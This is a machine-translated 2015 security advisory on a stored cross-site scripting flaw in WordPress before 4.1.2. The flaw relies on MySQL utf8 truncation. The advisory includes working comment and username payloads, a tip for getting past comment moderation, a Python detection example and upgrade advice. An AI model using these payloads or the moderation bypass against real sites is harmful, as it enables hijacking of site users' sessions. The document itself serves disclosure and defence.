WordPress < 4.1.2 has an XSS vulnerability that an attacker can exploit to obtain site permissions - bug warning - the black bar safety net

2015-04-27T00:00:00
ID MYHACK58:62201561743
Type myhack58
Reporter Anonymous
Modified 2015-04-27T00:00:00

Description

tl;dr: MySQL → special characters → truncation → input validation → output sanitisation → XSS → time to update WordPress.

MySQL truncation: MySQL's utf8 character set only supports characters of up to 3 bytes. If a 4-byte character is inserted, MySQL in its default configuration truncates the string at that character. MySQL strict mode solves this problem; the default is turned on.
Example (before insert): ex�tic (the � stands for a 4-byte character)
Example (after insert): ex

WordPress: WordPress comments support HTML tags.
A nice user could comment: <abbr title='Web log'>blog!</abbr>
A not so nice user could comment: <abbr title='Web�log'>blog!</abbr>

Both comments pass WordPress input validation, and the second one is saved as: <abbr title='Web

The input has been truncated at the 4-byte character, leaving the title attribute open. The user now sets the username: cedric' onmouseover='alert(1)' style='position:fixed;top:0;left:0;width:100%;height:100%'

The final output is:
<div class="comment" id="comment-1">
  <div class="comment-author">Testing</div>
  <div class="comment-content"><p>the <abbr title='Web</p></div>
</div>
<div class="comment" id="comment-2">
  <div class="comment-author">cedric' onmouseover='alert(1)' style='position:fixed;top:0;left:0;width:100%;height:100%'</div>
  <div class="comment-content"><p>Injected</p></div>
</div>

Tidied up: the browser treats everything up to the next single quote as the value of the unclosed title attribute, so the abbr tag effectively becomes <abbr title='Web...... cedric' onmouseover='alert(1)' style='position:fixed;top:0;left:0;width:100%;height:100%'>

Thus we have a stored cross-site scripting. The output-filter bypass above is relatively complex; there is also another way. When a comment contains a newline, the quote character is re-encoded. If we input: sometext<blockquote cite='x onmouseover=alert(1) style=position:fixed;width:100%;height:100%;top:0; �'>

We eventually get: <blockquote cite="x onmouseover=alert(1) style=position:fixed;width:100%;height:100%;top:0; ...> (the ... marks where the stored value is cut off at the 4-byte character, so the cite attribute is never closed)

Usage: an unknown user's first comment must be reviewed by a moderator. If the user first posts a normal comment and waits for it to be approved, their later comments are published directly without review, and the XSS comment can then be posted.
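The storage-side truncation described above, together with the checks a site operator could run before an INSERT and over already-stored comments, as an added Python example (not WordPress or MySQL code; the function names are made up, and U+1F600 is used as a stand-in for the 4-byte character shown as � in the text):

```python
# Added example (not WordPress or MySQL code; names are made up).  Emulates the
# MySQL 'utf8' truncation the advisory describes and the checks a comment
# pipeline could add before and after storage.

def mysql_utf8_store(text: str, strict: bool = False) -> str:
    """Emulate writing `text` into a MySQL 'utf8' (3-byte) column.
    Code points above U+FFFF need 4 UTF-8 bytes.  With strict mode off, MySQL
    silently cuts the string at the first such character; with strict mode on
    the INSERT fails, emulated here by raising ValueError."""
    for i, ch in enumerate(text):
        if ord(ch) > 0xFFFF:
            if strict:
                raise ValueError(f"4-byte character at offset {i} rejected")
            return text[:i]
    return text

def strict_rejects(text: str) -> bool:
    """True if strict mode would refuse the INSERT instead of truncating."""
    try:
        mysql_utf8_store(text, strict=True)
    except ValueError:
        return True
    return False

def safe_to_store(sanitised: str) -> bool:
    """Pre-INSERT check: a sanitised comment is only safe if storage returns it
    unchanged, otherwise the input filter's approval no longer applies."""
    return mysql_utf8_store(sanitised) == sanitised

def ends_inside_open_tag(stored: str) -> bool:
    """Post-storage check for the symptom in the advisory: the comment is cut
    off inside a tag (its last '<' has no '>'), so its open quote swallows the
    HTML rendered after it."""
    last_open = stored.rfind("<")
    return last_open != -1 and stored.find(">", last_open) == -1

def audit_stored_comments(comments: list) -> list:
    """Indices of already-stored comments that end inside an open tag."""
    return [i for i, c in enumerate(comments) if ends_inside_open_tag(c)]

# Constructed samples; U+1F600 stands in for the 4-byte character that the
# advisory text renders as the replacement character.
NICE_COMMENT = "<abbr title='Web log'>blog!</abbr>"
TRUNCATING_COMMENT = "<abbr title='Web\U0001F600log'>blog!</abbr>"
BLOCKQUOTE_COMMENT = ("sometext<blockquote cite='x onmouseover=alert(1) "
                      "style=position:fixed;width:100%;height:100%;top:0; \U0001F600'>")
```

Running audit_stored_comments over an existing comment table is the quickest way to find rows that were already cut off this way before the upgrade.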

Solutions

Upgrade as soon as possible to version 4.2, the current latest. If you cannot upgrade, set the MySQL character set to latin1, or carefully review comments.